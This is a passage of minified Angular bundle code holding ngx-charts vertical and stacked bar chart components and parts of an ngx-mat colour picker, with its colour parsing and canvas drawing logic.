e;this.updateTooltipSettings(),this.series.length&&(e=this.xScale.bandwidth()),e=Math.round(e);const i=Math.max(this.yScale.domain()[0],0),n={[Sp.positive]:0,[Sp.negative]:0};let c,r=Sp.positive;this.type===Pm.Normalized&&(c=this.series.map(d=>d.value).reduce((d,T)=>d+T,0)),this.bars=this.series.map((d,T)=>{let k=d.value;const q=this.getLabel(d),Y=Ub(q);r=k>0?Sp.positive:Sp.negative;const pe={value:k,label:q,roundEdges:this.roundEdges,data:d,width:e,formattedLabel:Y,height:0,x:0,y:0};if(this.type===Pm.Standard)pe.height=Math.abs(this.yScale(k)-this.yScale(i)),pe.x=this.xScale(q),pe.y=this.yScale(k<0?0:k);else if(this.type===Pm.Stacked){const Fe=n[r],Ne=Fe+k;n[r]+=k,pe.height=this.yScale(Fe)-this.yScale(Ne),pe.x=0,pe.y=this.yScale(Ne),pe.offset0=Fe,pe.offset1=Ne}else if(this.type===Pm.Normalized){let Fe=n[r],Ne=Fe+k;n[r]+=k,c>0?(Fe=100*Fe/c,Ne=100*Ne/c):(Fe=0,Ne=0),pe.height=this.yScale(Fe)-this.yScale(Ne),pe.x=0,pe.y=this.yScale(Ne),pe.offset0=Fe,pe.offset1=Ne,k=(Ne-Fe).toFixed(2)+"%"}this.colors.scaleType===Wa.Ordinal?pe.color=this.colors.getColor(q):this.type===Pm.Standard?(pe.color=this.colors.getColor(k),pe.gradientStops=this.colors.getLinearGradientStops(k)):(pe.color=this.colors.getColor(pe.offset1),pe.gradientStops=this.colors.getLinearGradientStops(pe.offset1,pe.offset0));let Re=Y;return pe.ariaLabel=Y+" "+k.toLocaleString(),null!=this.seriesName&&(Re=`${this.seriesName} \u2022 ${Y}`,pe.data.series=this.seriesName,pe.ariaLabel=this.seriesName+" "+pe.ariaLabel),pe.tooltipText=this.tooltipDisabled?void 0:`\n        <span class="tooltip-label">${function jI(t){return t.toLocaleString().replace(/[&'`"<>]/g,a=>({"&":"&amp;","'":"&#x27;","`":"&#x60;",'"':"&quot;","<":"&lt;",">":"&gt;"}[a]))}(Re)}</span>\n        <span class="tooltip-val">${this.dataLabelFormatting?this.dataLabelFormatting(k):k.toLocaleString()}</span>\n      `,pe}),this.updateDataLabels()}updateDataLabels(){if(this.type===Pm.Stacked){this.barsForDataLabels=[];const e={};e.series=this.seriesName;const i=this.series.map(r=>r.value).reduce((r,c)=>c>0?r+c:r,0),n=this.series.map(r=>r.value).reduce((r,c)=>c<0?r+c:r,0);e.total=i+n,e.x=0,e.y=0,e.height=this.yScale(e.total>0?i:n),e.width=this.xScale.bandwidth(),this.barsForDataLabels.push(e)}else this.barsForDataLabels=this.series.map(e=>{var i;const n={};return n.series=null!==(i=this.seriesName)&&void 0!==i?i:e.label,n.total=e.value,n.x=this.xScale(e.label),n.y=this.yScale(0),n.height=this.yScale(n.total)-this.yScale(0),n.width=this.xScale.bandwidth(),n})}updateTooltipSettings(){this.tooltipPlacement=this.tooltipDisabled?void 0:kn.Top,this.tooltipType=this.tooltipDisabled?void 0:Ng.tooltip}isActive(e){return!!this.activeEntries&&void 0!==this.activeEntries.find(n=>e.name===n.name&&e.value===n.value)}onClick(e){this.select.emit(e)}getLabel(e){return e.label?e.label:e.name}trackBy(e,i){return i.label}trackDataLabelBy(e,i){return e+"#"+i.series+"#"+i.total}}return t.\u0275fac=function(e){return new(e||t)(Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["g","ngx-charts-series-vertical",""]],inputs:{dims:"dims",type:"type",series:"series",xScale:"xScale",yScale:"yScale",colors:"colors",gradient:"gradient",activeEntries:"activeEntries",seriesName:"seriesName",tooltipDisabled:"tooltipDisabled",tooltipTemplate:"tooltipTemplate",roundEdges:"roundEdges",animations:"animations",showDataLabel:"showDataLabel",dataLabelFormatting:"dataLabelFormatting",noBarWhenZero:"noBarWhenZero"},outputs:{select:"select",activate:"activate",deactivate:"deactivate",dataLabelHeightChanged:"dataLabelHeightChanged"},features:[sa],attrs:DDe,decls:3,vars:3,consts:[[4,"ngIf"],["ngx-charts-bar","","ngx-tooltip","",3,"width","height","x","y","fill","stops","data","orientation","roundEdges","gradient","ariaLabel","isActive","tooltipDisabled","tooltipPlacement","tooltipType","tooltipTitle","tooltipTemplate","tooltipContext","noBarWhenZero","animations","select","activate","deactivate",4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-bar","","ngx-tooltip","",3,"width","height","x","y","fill","stops","data","orientation","roundEdges","gradient","ariaLabel","isActive","tooltipDisabled","tooltipPlacement","tooltipType","tooltipTitle","tooltipTemplate","tooltipContext","noBarWhenZero","animations","select","activate","deactivate"],["ngx-charts-bar-label","",3,"barX","barY","barWidth","barHeight","value","valueFormatting","orientation","dimensionsChanged",4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-bar-label","",3,"barX","barY","barWidth","barHeight","value","valueFormatting","orientation","dimensionsChanged"]],template:function(e,i){1&e&&(ne(0,wDe,2,2,"g",0),ne(1,RDe,2,2,"g",0),ne(2,kDe,2,2,"g",0)),2&e&&(V("ngIf",!i.isSSR),C(1),V("ngIf",i.isSSR),C(1),V("ngIf",i.showDataLabel))},dependencies:[w6e,I6e,Ri,Zi,$I],encapsulation:2,data:{animation:[ar("animationState",[gn(":leave",[zi({opacity:1}),En(500,zi({opacity:0}))])])]},changeDetection:0}),t})(),S6e=(()=>{class t extends hq{constructor(){super(...arguments),this.legend=!1,this.legendTitle="Legend",this.legendPosition=Su.Right,this.tooltipDisabled=!1,this.showGridLines=!0,this.activeEntries=[],this.trimXAxisTicks=!0,this.trimYAxisTicks=!0,this.rotateXAxisTicks=!0,this.maxXAxisTickLength=16,this.maxYAxisTickLength=16,this.barPadding=8,this.roundDomains=!1,this.showDataLabel=!1,this.noBarWhenZero=!0,this.activate=new Tt,this.deactivate=new Tt,this.margin=[10,20,10,20],this.xAxisHeight=0,this.yAxisWidth=0,this.dataLabelMaxHeight={negative:0,positive:0},this.isSSR=!1,this.barChartType=Pm,this.trackBy=(e,i)=>i.name}ngOnInit(){Zv(this.platformId)&&(this.isSSR=!0)}update(){super.update(),this.showDataLabel||(this.dataLabelMaxHeight={negative:0,positive:0}),this.margin=[10+this.dataLabelMaxHeight.positive,20,10+this.dataLabelMaxHeight.negative,20],this.dims=function T6e({width:t,height:a,margins:e,showXAxis:i=!1,showYAxis:n=!1,xAxisHeight:r=0,yAxisWidth:c=0,showXLabel:d=!1,showYLabel:T=!1,showLegend:k=!1,legendType:q=Wa.Ordinal,legendPosition:Y=Su.Right,columns:te=12}){let pe=e[3],Re=t,Fe=a-e[0]-e[2];return k&&Y===Su.Right&&(te-=q===Wa.Ordinal?2:1),Re=Re*te/12,Re=Re-e[1]-e[3],i&&(Fe-=5,Fe-=r,d&&(Fe-=30)),n&&(Re-=5,Re-=c,pe+=c,pe+=10,T&&(Re-=30,pe+=30)),Re=Math.max(0,Re),Fe=Math.max(0,Fe),{width:Math.floor(Re),height:Math.floor(Fe),xOffset:Math.floor(pe)}}({width:this.width,height:this.height,margins:this.margin,showXAxis:this.xAxis,showYAxis:this.yAxis,xAxisHeight:this.xAxisHeight,yAxisWidth:this.yAxisWidth,showXLabel:this.showXAxisLabel,showYLabel:this.showYAxisLabel,showLegend:this.legend,legendType:this.schemeType,legendPosition:this.legendPosition}),this.showDataLabel&&(this.dims.height-=this.dataLabelMaxHeight.negative),this.formatDates(),this.groupDomain=this.getGroupDomain(),this.innerDomain=this.getInnerDomain(),this.valueDomain=this.getValueDomain(),this.xScale=this.getXScale(),this.yScale=this.getYScale(),this.setColors(),this.legendOptions=this.getLegendOptions(),this.transform=`translate(${this.dims.xOffset} , ${this.margin[0]+this.dataLabelMaxHeight.negative})`}getGroupDomain(){const e=[];for(const i of this.results)e.includes(i.label)||e.push(i.label);return e}getInnerDomain(){const e=[];for(const i of this.results)for(const n of i.series)e.includes(n.label)||e.push(n.label);return e}getValueDomain(){const e=[];let i=0,n=0;for(const d of this.results){let T=0,k=0;for(const q of d.series)q.value<0?T+=q.value:k+=q.value,i=q.value<i?q.value:i,n=q.value>n?q.value:n;e.push(T),e.push(k)}return e.push(i),e.push(n),[Math.min(0,...e),this.yScaleMax?Math.max(this.yScaleMax,...e):Math.max(...e)]}getXScale(){const e=this.groupDomain.length/(this.dims.width/this.barPadding+1);return sT().rangeRound([0,this.dims.width]).paddingInner(e).domain(this.groupDomain)}getYScale(){const e=l2().range([this.dims.height,0]).domain(this.valueDomain);return this.roundDomains?e.nice():e}onDataLabelMaxHeightChanged(e,i){e.size.negative?this.dataLabelMaxHeight.negative=Math.max(this.dataLabelMaxHeight.negative,e.size.height):this.dataLabelMaxHeight.positive=Math.max(this.dataLabelMaxHeight.positive,e.size.height),i===this.results.length-1&&setTimeout(()=>this.update())}groupTransform(e){return`translate(${this.xScale(e.name)||0}, 0)`}onClick(e,i){i&&(e.series=i.name),this.select.emit(e)}setColors(){let e;e=this.schemeType===Wa.Ordinal?this.innerDomain:this.valueDomain,this.colors=new E6e(this.scheme,this.schemeType,e,this.customColors)}getLegendOptions(){const e={scaleType:this.schemeType,colors:void 0,domain:[],title:void 0,position:this.legendPosition};return e.scaleType===Wa.Ordinal?(e.domain=this.innerDomain,e.colors=this.colors,e.title=this.legendTitle):(e.domain=this.valueDomain,e.colors=this.colors.scale),e}updateYAxisWidth({width:e}){this.yAxisWidth=e,this.update()}updateXAxisHeight({height:e}){this.xAxisHeight=e,this.update()}onActivate(e,i,n=!1){const r=Object.assign({},e);i&&(r.series=i.name);const c=this.results.map(d=>d.series).flat().filter(d=>n?d.label===r.name:d.name===r.name&&d.series===r.series);this.activeEntries=[...c],this.activate.emit({value:r,entries:this.activeEntries})}onDeactivate(e,i,n=!1){const r=Object.assign({},e);i&&(r.series=i.name),this.activeEntries=this.activeEntries.filter(c=>n?c.label!==r.name:!(c.name===r.name&&c.series===r.series)),this.deactivate.emit({value:r,entries:this.activeEntries})}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-bar-vertical-stacked"]],contentQueries:function(e,i,n){if(1&e&&ha(n,cDe,5),2&e){let r;Vt(r=Bt())&&(i.tooltipTemplate=r.first)}},inputs:{legend:"legend",legendTitle:"legendTitle",legendPosition:"legendPosition",xAxis:"xAxis",yAxis:"yAxis",showXAxisLabel:"showXAxisLabel",showYAxisLabel:"showYAxisLabel",xAxisLabel:"xAxisLabel",yAxisLabel:"yAxisLabel",tooltipDisabled:"tooltipDisabled",gradient:"gradient",showGridLines:"showGridLines",activeEntries:"activeEntries",schemeType:"schemeType",trimXAxisTicks:"trimXAxisTicks",trimYAxisTicks:"trimYAxisTicks",rotateXAxisTicks:"rotateXAxisTicks",maxXAxisTickLength:"maxXAxisTickLength",maxYAxisTickLength:"maxYAxisTickLength",xAxisTickFormatting:"xAxisTickFormatting",yAxisTickFormatting:"yAxisTickFormatting",xAxisTicks:"xAxisTicks",yAxisTicks:"yAxisTicks",barPadding:"barPadding",roundDomains:"roundDomains",yScaleMax:"yScaleMax",showDataLabel:"showDataLabel",dataLabelFormatting:"dataLabelFormatting",noBarWhenZero:"noBarWhenZero"},outputs:{activate:"activate",deactivate:"deactivate"},features:[ci],decls:6,vars:13,consts:[[3,"view","showLegend","legendOptions","activeEntries","animations","legendLabelActivate","legendLabelDeactivate","legendLabelClick"],[1,"bar-chart","chart"],["ngx-charts-x-axis","",3,"xScale","dims","showLabel","labelText","trimTicks","rotateTicks","maxTickLength","tickFormatting","ticks","xAxisOffset","dimensionsChanged",4,"ngIf"],["ngx-charts-y-axis","",3,"yScale","dims","showGridLines","showLabel","labelText","trimTicks","maxTickLength","tickFormatting","ticks","dimensionsChanged",4,"ngIf"],[4,"ngIf"],["ngx-charts-x-axis","",3,"xScale","dims","showLabel","labelText","trimTicks","rotateTicks","maxTickLength","tickFormatting","ticks","xAxisOffset","dimensionsChanged"],["ngx-charts-y-axis","",3,"yScale","dims","showGridLines","showLabel","labelText","trimTicks","maxTickLength","tickFormatting","ticks","dimensionsChanged"],[4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-series-vertical","",3,"type","xScale","yScale","activeEntries","colors","series","dims","gradient","tooltipDisabled","tooltipTemplate","showDataLabel","dataLabelFormatting","seriesName","animations","noBarWhenZero","select","activate","deactivate","dataLabelHeightChanged"]],template:function(e,i){1&e&&(m(0,"ngx-charts-chart",0),he("legendLabelActivate",function(r){return i.onActivate(r,void 0,!0)})("legendLabelDeactivate",function(r){return i.onDeactivate(r,void 0,!0)})("legendLabelClick",function(r){return i.onClick(r)}),fi(),m(1,"g",1),ne(2,zDe,1,10,"g",2),ne(3,WDe,1,9,"g",3),ne(4,VDe,2,2,"g",4),u(),ne(5,HDe,2,2,"g",4),u()),2&e&&(V("view",Ah(10,Hb,i.width,i.height))("showLegend",i.legend)("legendOptions",i.legendOptions)("activeEntries",i.activeEntries)("animations",i.animations),C(1),Rt("transform",i.transform),C(1),V("ngIf",i.xAxis),C(1),V("ngIf",i.yAxis),C(1),V("ngIf",!i.isSSR),C(1),V("ngIf",i.isSSR))},dependencies:[mq,_6e,g6e,R6e,Ri,Zi],styles:[".ngx-charts-outer{-webkit-animation:chartFadeIn linear .6s;animation:chartFadeIn linear .6s}@-webkit-keyframes chartFadeIn{0%{opacity:0}20%{opacity:0}to{opacity:1}}@keyframes chartFadeIn{0%{opacity:0}20%{opacity:0}to{opacity:1}}.ngx-charts{float:left;overflow:visible}.ngx-charts .circle,.ngx-charts .cell,.ngx-charts .bar,.ngx-charts .arc{cursor:pointer}.ngx-charts .bar.active,.ngx-charts .bar:hover,.ngx-charts .cell.active,.ngx-charts .cell:hover,.ngx-charts .arc.active,.ngx-charts .arc:hover,.ngx-charts .card.active,.ngx-charts .card:hover{opacity:.8;transition:opacity .1s ease-in-out}.ngx-charts .bar:focus,.ngx-charts .cell:focus,.ngx-charts .arc:focus,.ngx-charts .card:focus{outline:none}.ngx-charts .bar.hidden,.ngx-charts .cell.hidden,.ngx-charts .arc.hidden,.ngx-charts .card.hidden{display:none}.ngx-charts g:focus{outline:none}.ngx-charts .line-series.inactive,.ngx-charts .line-series-range.inactive,.ngx-charts .polar-series-path.inactive,.ngx-charts .polar-series-area.inactive,.ngx-charts .area-series.inactive{transition:opacity .1s ease-in-out;opacity:.2}.ngx-charts .line-highlight{display:none}.ngx-charts .line-highlight.active{display:block}.ngx-charts .area{opacity:.6}.ngx-charts .circle:hover{cursor:pointer}.ngx-charts .label{font-size:12px;font-weight:400}.ngx-charts .tooltip-anchor{fill:#000}.ngx-charts .gridline-path{stroke:#ddd;stroke-width:1;fill:none}.ngx-charts .refline-path{stroke:#a8b2c7;stroke-width:1;stroke-dasharray:5;stroke-dashoffset:5}.ngx-charts .refline-label{font-size:9px}.ngx-charts .reference-area{fill-opacity:.05;fill:#000}.ngx-charts .gridline-path-dotted{stroke:#ddd;stroke-width:1;fill:none;stroke-dasharray:1,20;stroke-dashoffset:3}.ngx-charts .grid-panel rect{fill:none}.ngx-charts .grid-panel.odd rect{fill:#0000000d}\n"],encapsulation:2,data:{animation:[ar("animationState",[gn(":leave",[zi({opacity:1,transform:"*"}),En(500,zi({opacity:0,transform:"scale(0)"}))])])]},changeDetection:0}),t})(),xq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),k6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),P6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),O6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),wq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})();Math;let YI=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),z6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd,YI,wq]]}),t})(),F6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),V6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd]]}),t})(),B6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Fd,YI,xq]]}),t})(),Iq=(()=>{class t{constructor(){!function H6e(){"undefined"!=typeof SVGElement&&void 0===SVGElement.prototype.contains&&(SVGElement.prototype.contains=HTMLDivElement.prototype.contains)}()}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Fd,x6e,xq,k6e,P6e,O6e,wq,z6e,F6e,YI,V6e,B6e]}),t})();const Rq=function(t){return{active:t}};function U6e(t,a){if(1&t){const e=Ye();m(0,"button",2),he("click",function(){const r=be(e).$implicit;return Me(B().select(r))}),u()}if(2&t){const e=a.$implicit,i=B();ri("background-color",e),V("ngClass",fr(3,Rq,i.selectedColor===e))}}function q6e(t,a){if(1&t){const e=Ye();m(0,"button",2),he("click",function(){const r=be(e).$implicit;return Me(B().select(r))}),u()}if(2&t){const e=a.$implicit,i=B();ri("background-color",e),V("ngClass",fr(3,Rq,i.selectedColor===e))}}const G6e=/^\s+/,j6e=/\s+$/,u2=Math.round,Q6e=(Math,Math,Math,/[^0-9]/g),Sq=["#ffffff","#ffff00","#ff00ff","#ff0000","#c0c0c0","#808080","#808000","#800080","#800000","#00ffff","#00ff00","#008080","#008000","#0000ff","#000080","#000000"];function kq(t,a,e){const i=t.getImageData(a,e,1,1).data;return{r:i[0],g:i[1],b:i[2]}}function Lg(t){return 1==t.length?"0"+t:""+t}function K6e(t){return Math.round(255*parseFloat(t)).toString(16)}function Pq(t){return Xl(t)/255}function Xl(t){return parseInt(t,16)}function Oq(t,a,e,i){var n=[Lg(u2(t).toString(16)),Lg(u2(a).toString(16)),Lg(u2(e).toString(16))];return i&&n[0].charAt(0)==n[0].charAt(1)&&n[1].charAt(0)==n[1].charAt(1)&&n[2].charAt(0)==n[2].charAt(1)?n[0].charAt(0)+n[1].charAt(0)+n[2].charAt(0):n.join("")}const kp="(?:[-\\+]?\\d*\\.\\d+%?)|(?:[-\\+]?\\d+%?)",JI="[\\s|\\(]+("+kp+")[,|\\s]+("+kp+")[,|\\s]+("+kp+")\\s*\\)?",ZI="[\\s|\\(]+("+kp+")[,|\\s]+("+kp+")[,|\\s]+("+kp+")[,|\\s]+("+kp+")\\s*\\)?",zg={CSS_UNIT:new RegExp(kp),rgb:new RegExp("rgb"+JI),rgba:new RegExp("rgba"+ZI),hsl:new RegExp("hsl"+JI),hsla:new RegExp("hsla"+ZI),hsv:new RegExp("hsv"+JI),hsva:new RegExp("hsva"+ZI),hex3:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex6:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/,hex4:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex8:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/};function e5(t){let a;return t=t.replace(G6e,"").replace(j6e,"").toLowerCase(),(a=zg.rgb.exec(t))?{r:a[1],g:a[2],b:a[3],a:1}:(a=zg.rgba.exec(t))?{r:a[1],g:a[2],b:a[3],a:a[4]}:(a=zg.hex8.exec(t))?{r:Xl(a[1]),g:Xl(a[2]),b:Xl(a[3]),a:Pq(a[4])}:(a=zg.hex6.exec(t))?{r:Xl(a[1]),g:Xl(a[2]),b:Xl(a[3]),a:1}:(a=zg.hex4.exec(t))?{r:Xl(a[1]+""+a[1]),g:Xl(a[2]+""+a[2]),b:Xl(a[3]+""+a[3]),a:Pq(a[4]+""+a[4])}:(a=zg.hex3.exec(t))?{r:Xl(a[1]+""+a[1]),g:Xl(a[2]+""+a[2]),b:Xl(a[3]+""+a[3]),a:1}:null}class Pp{constructor(a,e,i,n){this.r=a>255?255:a,this.g=e>255?255:e,this.b=i>255?255:i,this.a=null!=n?n>1?1:n:1,this.roundA=Math.round(this.a),this.hex=Oq(this.r,this.g,this.b),this.rgba=this.toRgba()}toHex(a){return Oq(this.r,this.g,this.b,a)}toRgba(){return`rgba(${this.r},${this.g},${this.b},${this.a})`}toHexString(a){return"#"+this.toHex(a)}toRgbString(){return 1===this.a?"rgb("+Math.round(this.r)+", "+Math.round(this.g)+", "+Math.round(this.b)+")":"rgba("+Math.round(this.r)+", "+Math.round(this.g)+", "+Math.round(this.b)+", "+this.roundA+")"}toHex8(a){return function $6e(t,a,e,i,n){var r=[Lg(u2(t).toString(16)),Lg(u2(a).toString(16)),Lg(u2(e).toString(16)),Lg(K6e(i))];return n&&r[0].charAt(0)==r[0].charAt(1)&&r[1].charAt(0)==r[1].charAt(1)&&r[2].charAt(0)==r[2].charAt(1)&&r[3].charAt(0)==r[3].charAt(1)?r[0].charAt(0)+r[1].charAt(0)+r[2].charAt(0)+r[3].charAt(0):r.join("")}(this.r,this.g,this.b,this.a,a)}toHex8String(a){return"#"+this.toHex8(a)}toString(a){let i;return a||!(this.a<1&&this.a>=0)||"hex"!==a&&"hex6"!==a&&"hex3"!==a&&"hex4"!==a&&"hex8"!==a?("rgb"===a&&(i=this.toRgbString()),("hex"===a||"hex6"===a)&&(i=this.toHexString()),"hex3"===a&&(i=this.toHexString(!0)),"hex4"===a&&(i=this.toHex8String(!0)),"hex8"===a&&(i=this.toHex8String()),i||this.toHexString()):this.toRgbString()}}let Nq=(()=>{class t{constructor(e,i){this.zone=e,this.colorChanged=new Tt,this.x=0,this.y=0,this.drag=!1,this._destroyed=new J,this.elementId=i}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}ngAfterViewInit(){this.canvas=document.getElementById(this.elementId),this.ctx=this.canvas.getContext("2d"),this.width=this.canvas.width,this.height=this.canvas.height,this.draw()}draw(){this.ctx.clearRect(0,0,this.width,this.height),this.ctx.rect(0,0,this.width,this.height),this.fillGradient(),0!=this.y&&this.redrawIndicator(this.x,this.y)}onMousedown(e){this.drag=!0,this.changeColor(e),this.zone.runOutsideAngular(()=>{this.canvas.addEventListener("mousemove",this.onMousemove.bind(this))})}onMousemove(e){this.drag&&this.zone.run(()=>{this.changeColor(e)})}onMouseup(e){this.drag=!1,this.canvas.removeEventListener("mousemove",this.onMousemove)}emitChange(e){this.colorChanged.emit(e)}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,inputs:{color:"color"},outputs:{colorChanged:"colorChanged"}}),t})(),J6e=(()=>{class t extends Nq{constructor(e){super(e,"color-strip"),this.zone=e}ngOnInit(){}ngAfterViewInit(){super.ngAfterViewInit()}fillGradient(){const e=this.ctx.createLinearGradient(0,0,0,this.height);e.addColorStop(0,"rgba(255, 0, 0, 1)"),e.addColorStop(.17,"rgba(255, 255, 0, 1)"),e.addColorStop(.34,"rgba(0, 255, 0, 1)"),e.addColorStop(.51,"rgba(0, 255, 255, 1)"),e.addColorStop(.68,"rgba(0, 0, 255, 1)"),e.addColorStop(.85,"rgba(255, 0, 255, 1)"),e.addColorStop(1,"rgba(255, 0, 0, 1)"),this.ctx.fillStyle=e,this.ctx.fill()}redrawIndicator(e,i){this.ctx.beginPath(),this.ctx.strokeStyle="white",this.ctx.lineWidth=2,this.ctx.arc(7.5,i,7.5,0,2*Math.PI,!1),this.ctx.stroke(),this.ctx.closePath()}changeColor(e){this.x=e.offsetX,this.y=e.offsetY,this.draw();const{r:i,g:n,b:r}=kq(this.ctx,e.offsetX,e.offsetY);this.emitChange(new Pp(i,n,r))}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-slider"]],features:[ci],decls:1,vars:0,consts:[["id","color-strip","width","15","height","200",1,"zone-strip",3,"mousedown","mouseup"]],template:function(e,i){1&e&&(m(0,"canvas",0),he("mousedown",function(r){return i.onMousedown(r)})("mouseup",function(r){return i.onMouseup(r)}),u())}}),t})(),Z6e=(()=>{class t{constructor(){}onInput(e){this._formatInput(e.target)}_formatInput(e){let i=Number(e.value.replace(Q6e,""));i=isNaN(i)?0:i,e.value=i}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","ngxMatNumericColorInput",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i.onInput(r)})}}),t})(),txe=(()=>{class t extends Nq{constructor(e){super(e,"color-block"),this.zone=e,this._resetBaseColor=!0,this.formGroup=new R4({r:new lu(null,[Ad.required]),g:new lu(null,[Ad.required]),b:new lu(null,[Ad.required]),a:new lu(null,[Ad.required]),hex:new lu(null,[Ad.required,Ad.pattern(zg.hex6)])})}get rCtrl(){return this.formGroup.get("r")}get gCtrl(){return this.formGroup.get("g")}get bCtrl(){return this.formGroup.get("b")}get aCtrl(){return this.formGroup.get("a")}get hexCtrl(){return this.formGroup.get("hex")}ngOnInit(){ra(this.rCtrl.valueChanges,this.gCtrl.valueChanges,this.bCtrl.valueChanges,this.aCtrl.valueChanges).pipe(ea(this._destroyed),dp(400)).subscribe(n=>{const r=new Pp(Number(this.rCtrl.value),Number(this.gCtrl.value),Number(this.bCtrl.value),Number(this.aCtrl.value));this.emitChange(r)}),this.hexCtrl.valueChanges.pipe(ea(this._destroyed),dp(400),Bh()).subscribe(n=>{const r=e5(n);if(null!=r){const c=new Pp(r.r,r.g,r.b,r.a);this.emitChange(c)}})}ngOnChanges(e){e.color&&e.color.currentValue&&(this.updateForm(e.color.currentValue),this._resetBaseColor&&(this._baseColor=e.color.currentValue),this._resetBaseColor=!0,e.color.firstChange||this.draw())}updateForm(e){const i={emitEvent:!1};this.rCtrl.setValue(e.r,i),this.gCtrl.setValue(e.g,i),this.bCtrl.setValue(e.b,i),this.aCtrl.setValue(e.a,i),this.hexCtrl.setValue(e.hex,i)}redrawIndicator(e,i){this.ctx.beginPath(),this.ctx.strokeStyle="white",this.ctx.arc(e,i,5,0,2*Math.PI,!1),this.ctx.stroke(),this.ctx.closePath()}fillGradient(){this.ctx.fillStyle=this._baseColor?this._baseColor.rgba:"rgba(255,255,255,1)",this.ctx.fillRect(0,0,this.width,this.height);const e=this.ctx.createLinearGradient(0,0,this.width,0);e.addColorStop(0,"rgba(255,255,255,1)"),e.addColorStop(1,"rgba(255,255,255,0)"),this.ctx.fillStyle=e,this.ctx.fillRect(0,0,this.width,this.height);const i=this.ctx.createLinearGradient(0,0,0,this.height);i.addColorStop(0,"rgba(0,0,0,0)"),i.addColorStop(1,"rgba(0,0,0,1)"),this.ctx.fillStyle=i,this.ctx.fillRect(0,0,this.width,this.height)}onSliderColorChanged(e){this._baseColor=e,this.color=e,this.fillGradient(),this.emitChange(e)}changeColor(e){this.x=e.offsetX,this.y=e.offsetY,this._resetBaseColor=!1,this.draw();const{r:i,g:n,b:r}=kq(this.ctx,e.offsetX,e.offsetY);this.emitChange(new Pp(i,n,r))}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-canvas"]],hostAttrs:[1,"ngx-mat-color-canvas"],features:[ci,sa],decls:30,vars:3,consts:[[3,"formGroup"],[1,"color-canvas-row"],[1,"zone-canvas"],["id","color-block","width","200","height","200",1,"zone-block",3,"mousedown","mouseup"],[3,"colorChanged"],[1,"zone-inputs"],["matInput","","formControlName","r","ngxMatNumericColorInput","","autocomplete","off"],["matInput","","formControlName","g","ngxMatNumericColorInput","","autocomplete","off"],["matInput","","formControlName","b","ngxMatNumericColorInput","","autocomplete","off"],["mat-mini-fab","",1,"preview"],["matPrefix","",1,"symbol"],["matInput","","formControlName","hex","autocomplete","off"],["matInput","","formControlName","a","type","number","min","0","max","1","step","0.1","autocomplete","off"]],template:function(e,i){1&e&&(m(0,"form",0)(1,"div",1)(2,"div",2)(3,"canvas",3),he("mousedown",function(r){return i.onMousedown(r)})("mouseup",function(r){return i.onMouseup(r)}),u(),m(4,"ngx-mat-color-slider",4),he("colorChanged",function(r){return i.onSliderColorChanged(r)}),u()(),m(5,"div",5)(6,"mat-form-field")(7,"mat-label"),s(8,"R"),u(),it(9,"input",6),u(),m(10,"mat-form-field")(11,"mat-label"),s(12,"G"),u(),it(13,"input",7),u(),m(14,"mat-form-field")(15,"mat-label"),s(16,"B"),u(),it(17,"input",8),u()()(),m(18,"div",1),it(19,"button",9),m(20,"mat-form-field")(21,"mat-label"),s(22,"HEX6"),u(),m(23,"mat-label",10),s(24,"#\xa0"),u(),it(25,"input",11),u(),m(26,"mat-form-field")(27,"mat-label"),s(28,"A"),u(),it(29,"input",12),u()()()),2&e&&(V("formGroup",i.formGroup),C(19),ri("background-color",(null==i.color?null:i.color.rgba)||"transparent"))},dependencies:[nn,un,mF,Xa,da,EN,an,Ac,Ta,lN,Ed,mx,dg,lx,J6e,Z6e],styles:[".ngx-mat-color-canvas .color-canvas-row{display:flex}.ngx-mat-color-canvas .color-canvas-row:first-of-type{height:200px;margin-bottom:12px}.ngx-mat-color-canvas 